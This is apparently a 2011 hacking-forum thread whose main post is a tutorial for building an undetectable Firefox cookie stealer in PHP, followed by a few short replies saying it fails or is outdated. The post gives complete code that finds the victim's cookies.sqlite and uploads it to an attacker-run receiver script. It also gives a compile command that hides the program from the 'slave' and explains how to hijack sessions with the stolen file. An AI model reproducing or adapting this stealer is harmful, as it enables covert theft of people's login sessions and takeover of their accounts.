Hacking to the Next LEVEL
Please Register Here to Get Full Access

Rameez Ajmeri

[TUT] How to make a File/Cookie stealer using PHP! [FUD]

View previous topic View next topic Go down

[TUT] How to make a File/Cookie stealer using PHP! [FUD]

Post by LiF3 H4CK3R on Tue Mar 08, 2011 12:05 pm

Hey,
I recently learned PHP, which is the only language i know right now (in addition to html & javascript which I think don't count)
anyway I was thinking about a way to make a file/cookie stealer using php
I know PHP is a server-side language which made the idea quite stupid
but after some research I was able to achieve my goal

this is my first tut so it's gonna be crappy, you have been warned

What you will need
[1] Some experience with php (optional)
[2] Bambalam compiler (here)
bambalam is a piece of software that compiles php scripts to work under windows without additional requirements, think of it as a PHP to EXE converter
[3] a .DLL file that we'll need called php_curl.dll (here)

kay let's start,

we're going to be working to achieve the following goal:
making an FUD firefox's cookie stealer

we're going to be using 2 php scripts, the first is main.php which we will compile to exe later on:
Code:
<?PHP
function ip_log(){
    $data = file_get_contents("http://www.ip-adress.com/");
    preg_match_all("/[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}/",$data,$ip);
    return $ip[0][0];
}
function upload($file,$name){
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_VERBOSE, 0);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch,CURLOPT_VERBOSE,true);
    curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible;)");
    curl_setopt($ch, CURLOPT_URL,"SCRIPT HERE");
    curl_setopt($ch, CURLOPT_POST, true);
    // same as <input type="file" name="file_box">
    $post = array(
  "uploadedfile"=> "@$file",
        "fname" => $name
        );
    curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
    $response = curl_exec($ch);
}

$windir =  trim(shell_exec('echo %windir%')) . "\\"; // figure out the windows dir
$ip = ip_log();
$data = shell_exec('dir %APPDATA%\Mozilla\Firefox\Profiles'); //navigate to firefox's folder where cookies are kept
preg_match_all("/<DIR> +(.*\.default)/",$data,$pname);  // search for the profile name
$data = shell_exec("dir %APPDATA%\Mozilla\Firefox\Profiles\\" . $pname[1][0]); // enter the profile folder
preg_match_all("/Directory of (.*)/",$data,$loc);  //get the exact cookie's path
upload($loc[1][0] . "\cookies.sqlite",$ip . "_cookies.sqlite"); // upoad the cookies
?>

the script above is designed to steal firefox's cookies, if you have some knowledge with php, you can edit it to steal anything else, otherwise, use it as it is.

ok the second script we'll be calling receive.php
what it does is that it receives the cookies from the slave's PC sent by the first script, this script you need to upload to a free hosting that supports PHP, those are easy to find

Code:
<?PHP
$target_path = "/";
$target_path = $target_path . basename( $_FILES['uploadedfile']['name']);
if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
    echo "The file ".  basename( $_FILES['uploadedfile']['name']).
    " has been uploaded";
} else{
    echo "There was an error uploading the file, please try again!";
}
?>
after uploading the script above to your website, you need to get it's link eg. (http://www.yoursite.com/receive.php) and put it in the first script instead of the words (SCRIPT HERE)


okay now we're ready to compile the first script aka main.php
assuming that you downloaded "bambalam" (link above) and extracted its contents
copy main.php & php_curl.dll to the bambalam's folder
also if you want to give your exe file a decent icon, copy the icon file to the bambalam's dir too
open command prompt and navigate to bambalam directory that you extracted the files to, when you get to the folder type the following and press enter:
Code:
bamcompile.exe -w -e:php_curl.dll -i:icon.ico main.php main.exe
the -i switch is for the icon (Replace icon.ico in the command by the icon file name)
the -w switch is to hide the program while running so the slave won't know what hit him

[You must be registered and logged in to see this image.]

now a file will be created called main.exe in the bambalam dir
which is the stealer,
send it to the slave, when the slave opens it, his cookies will be sent to your online website, in the same path as the "receive.php" file
the cookie file name will be like this:
"slave-ip_cookies.sqlite"

What can I do with the cookies.sqlite file ?
the cookies.sqlite file is the file used by firefox to store cookies,
after obtaining the slave's cookies.sqlite file, you can replace your own cookie file with it,
you will find your firefox's cookie file in this dir:
Code:
%appdata%/mozilla/firefox/profiles

then you'll find a folder, inside it is the cookies.sqlite file, replace with the slave's, and you're done

Things you need to know:
[1] This method is completely experimental, the idea is pretty crazy and I don't think anyone introduced it before, so things could go wrong
[2] If you are having problems with the icon, try choosing small icon files, large icons may not work, this is just the way things are
[3] If you want to edit the main.php script be aware that you can only use PHP <= 4.3 with bambalam compiler.

Have fun... and ask if you have any questions
avatar
LiF3 H4CK3R
Rameez (ADMIN)
Rameez (ADMIN)

Posts : 36
Points : 103
Join date : 2011-01-22
Age : 28
Location : H3LL

View user profile http://alternate-reality.4umer.com

Back to top Go down

Re: [TUT] How to make a File/Cookie stealer using PHP! [FUD]

Post by OriginalsGeeks on Wed Dec 14, 2011 7:09 pm

Don't Work !

OriginalsGeeks

Posts : 1
Points : 1
Join date : 2011-12-14
Location : 127.0.0.1

View user profile

Back to top Go down

:( dun work

Post by xxdelxx on Mon Oct 01, 2012 3:05 pm

i did exactly as mentioned..it does not work..

xxdelxx

Posts : 1
Points : 1
Join date : 2012-09-30
Location : newzealand

View user profile

Back to top Go down

Re: [TUT] How to make a File/Cookie stealer using PHP! [FUD]

Post by MegaBedder on Sun Mar 31, 2013 3:44 am

Si, funciona solo que es mejor usar Apache y ejecutarlo en el servidor local.
Ya que esto solo funciona con windows en un servidor local.
Y yo creo que es muy obsoleto, ya que tienes que marcar tu objetivo.

MegaBedder

Posts : 2
Points : 2
Join date : 2013-03-31
Location : Honduras

View user profile

Back to top Go down

Re: [TUT] How to make a File/Cookie stealer using PHP! [FUD]

Post by Sponsored content


Sponsored content


Back to top Go down

View previous topic View next topic Back to top

- Similar topics

 
Permissions in this forum:
You cannot reply to topics in this forum